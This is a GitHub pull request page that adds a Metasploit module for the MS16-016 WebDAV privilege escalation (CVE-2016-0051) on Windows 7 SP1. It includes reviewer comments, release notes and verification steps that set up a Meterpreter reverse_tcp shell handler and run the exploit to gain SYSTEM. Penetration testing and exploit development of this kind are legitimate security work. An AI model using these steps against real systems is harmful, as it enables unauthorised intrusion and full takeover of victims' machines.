New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add ms16-016 local privilege escalation (originally #6695) #7075
Conversation
Of course I forget the module docs ... or did I? |
[ | ||
[ 'CVE', '2016-0051' ], | ||
[ 'MSB', 'MS16-016' ], | ||
[ 'URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0051' ] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This isn't needed because it's already your first reference :-)
Hmmm it's not working for me:
|
Oh no, never mind. It is working. The firewall blocked it. |
|
Release NotesAdd MS16-016 WebDAV null pointer dereference vulnerability - This module allows you to exploit a null pointer deference vulnerability in Windows 7 SP1's WebDAV, and escalate your privilege to SYSTEM. |
Nice work! Looks great. |
Adds module which exploits MS16-016 (CVE-2016-0051). This was originally #6695 - I've had one dead SSD and a lot of drama in between now and then
@sinn3r @OJ tagged as original reviewers
Verification
List the steps needed to make sure this thing works
use exploits/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost your_ip_address
set lport whatever_port_you_configured_the_payload_with
run -j
background
use exploits/windows/local/ms16_016_webdav
set payload windows/meterpreter/reverse_tcp
set lhost your_ip_address
set lport whatever_port_you_configured_the_payload_with
set session whatever_your_meterpreter_session_number_is
run
You should see something like this: